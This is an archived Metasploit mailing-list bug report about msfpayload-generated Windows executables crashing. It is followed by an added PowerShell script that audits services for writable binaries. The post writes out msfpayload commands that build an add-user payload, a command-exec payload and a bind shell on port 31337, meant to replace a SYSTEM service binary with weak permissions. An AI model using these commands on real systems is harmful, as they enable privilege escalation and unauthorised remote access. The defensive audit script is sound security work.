Metasploit mailing list archives

Bugs in msfpayload


From: nicob at nicob.net (Nicob)
Date: Wed, 05 Sep 2007 07:58:14 +0200

Hello !

[=] Bug report :

I recently tried to use msfpayload to exploit some weak ACL on the EXE
used by a SYSTEM service (something like [1]). The following tests were
done on two distinct French Windows XP SP2 machines, as an unprivileged user
and as an admin (msfpayload from trunk 5080, running on Linux):

1) msfpayload windows/adduser USER=toto PASS=titi X > adduser_toto_titi.exe

When executed: Access violation when reading [C2A353BE]

2) msfpayload windows/exec CMD="cmd /c dir c:\ > c:\out.txt" X > exec_dir_c.exe

When executed: Access violation when reading [C2A353BE]

3) msfpayload windows/shell/bind_tcp LPORT=31337 X > bind_tcp_31337.exe

When executed, the port is bound but the app crashes at the first command
sent over the connection:

C:\> nc -vn 127.0.0.1 31337
(UNKNOWN) [127.0.0.1] 31337 (?) open
dir
[ crash: Access violation when writing to [00000004] ]
C:\>

But using the "C" option of msfpayload and inserting the output into a small
skeleton (like [2]) works.

[=] Questions :

1) Is this bug known, or am I missing something?

2) Is it possible to add to the windows/adduser payload an option
allowing one to select a given group to which to add the user? Something like
the patch posted by Jerome in May [3].

3) How does one use a skeleton like [2] with a two-stage payload like
"msfpayload windows/shell/bind_tcp C"?

[=] Links :

1:http://www.ngssoftware.com/advisories/high-risk-vulnerability-in-cisco-vpn-client-cvpndexe/
2:http://seclists.org/fulldisclosure/2005/Dec/1286.html
3:http://www.metasploit.com/archive/framework/msg02188.html


Regards,
Nicob
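The report above starts from a service binary whose ACL lets a low-privileged user replace it. The following script is an added example, not part of the original post or of Metasploit: it audits every service on the host and reports binaries where Everyone, Users, Authenticated Users or INTERACTIVE hold write, modify, delete or full-control rights. It matches principals by well-known SID rather than by name so that it also works on localized (e.g. French) Windows installs, and it assumes PowerShell 3 or later for Get-CimInstance (older hosts can substitute Get-WmiObject).

```powershell
# Added example (not from the original post): find Windows services whose
# executable is writable by non-administrative principals.
# Assumes PowerShell 3+ and rights to read service configuration and file ACLs.

# Well-known SIDs for low-privileged principals (locale independent):
#   S-1-1-0 Everyone, S-1-5-32-545 BUILTIN\Users,
#   S-1-5-11 Authenticated Users, S-1-5-4 INTERACTIVE
$lowPrivSids = @('S-1-1-0', 'S-1-5-32-545', 'S-1-5-11', 'S-1-5-4')

# Rights that allow replacing or altering the service binary
$writeRights = [System.Security.AccessControl.FileSystemRights]::Write -bor
               [System.Security.AccessControl.FileSystemRights]::WriteData -bor
               [System.Security.AccessControl.FileSystemRights]::Modify -bor
               [System.Security.AccessControl.FileSystemRights]::Delete -bor
               [System.Security.AccessControl.FileSystemRights]::FullControl

function Get-ServiceBinaryPath {
    param([string]$PathName)
    # PathName may be quoted and/or carry arguments, e.g.
    #   "C:\Program Files\Foo\foo.exe" -service
    # An unquoted path containing spaces is itself a finding; here only the
    # first token is taken.
    if ($PathName -match '^"([^"]+)"') { return $Matches[1] }
    return ($PathName -split ' ')[0]
}

function Get-WritableServiceBinaries {
    Get-CimInstance Win32_Service | ForEach-Object {
        $svc = $_
        if (-not $svc.PathName) { return }
        $exe = Get-ServiceBinaryPath $svc.PathName
        if (-not (Test-Path -LiteralPath $exe)) { return }
        $acl = Get-Acl -LiteralPath $exe
        foreach ($ace in $acl.Access) {
            if ($ace.AccessControlType -ne 'Allow') { continue }
            # Resolve the principal to its SID; skip entries that cannot be translated
            try {
                $sid = $ace.IdentityReference.Translate(
                    [System.Security.Principal.SecurityIdentifier]).Value
            } catch { continue }
            if ($lowPrivSids -notcontains $sid) { continue }
            if (($ace.FileSystemRights -band $writeRights) -eq 0) { continue }
            [PSCustomObject]@{
                Service   = $svc.Name
                RunsAs    = $svc.StartName   # e.g. LocalSystem
                Binary    = $exe
                Principal = $ace.IdentityReference.Value
                Rights    = $ace.FileSystemRights
            }
        }
    }
}

Get-WritableServiceBinaries | Format-Table -AutoSize
```

Any row whose RunsAs is LocalSystem (or another privileged account) is the situation described in the report: a user with write access to that file can swap in their own executable and have it started with the service's privileges. The fix is to restrict the binary's ACL to SYSTEM and Administrators (icacls or Set-Acl), and to check the containing directory as well, since directory write rights allow the file to be renamed and replaced. Generic rights stored as raw integers (e.g. GENERIC_ALL) are not caught by the enum mask above and would need a separate check.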